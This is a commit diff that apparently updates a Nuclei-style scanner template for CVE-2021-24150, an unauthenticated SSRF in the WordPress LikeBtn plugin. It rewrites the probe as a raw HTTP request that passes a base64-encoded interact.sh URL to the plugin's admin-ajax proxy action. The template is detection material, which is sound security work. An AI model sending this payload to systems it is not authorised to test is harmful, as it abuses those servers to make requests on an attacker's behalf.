Update CVE-2021-24150.yaml
parent
b38c6bab7e
commit
1bbd536202
|
@ -14,12 +14,14 @@ info:
|
||||||
cve-id: CVE-2021-24150
|
cve-id: CVE-2021-24150
|
||||||
metadata:
|
metadata:
|
||||||
verified: true
|
verified: true
|
||||||
tags: cve,cve2021,wordpress,wp-plugin,wp,ssrf,wpscan,unauthenticated
|
tags: cve,cve2021,wordpress,wp-plugin,wp,ssrf,wpscan,unauth,likebtn-like-button
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- raw:
|
||||||
path:
|
- |
|
||||||
- "{{BaseURL}}/wp-admin/admin-ajax.php?action=likebtn_prx&likebtn_q={{base64('http://likebtn.com.interact.sh')}}"
|
@timeout: 10s
|
||||||
|
GET /wp-admin/admin-ajax.php?action=likebtn_prx&likebtn_q={{base64('http://likebtn.com.interact.sh')}}" HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
|
Loading…
Reference in New Issue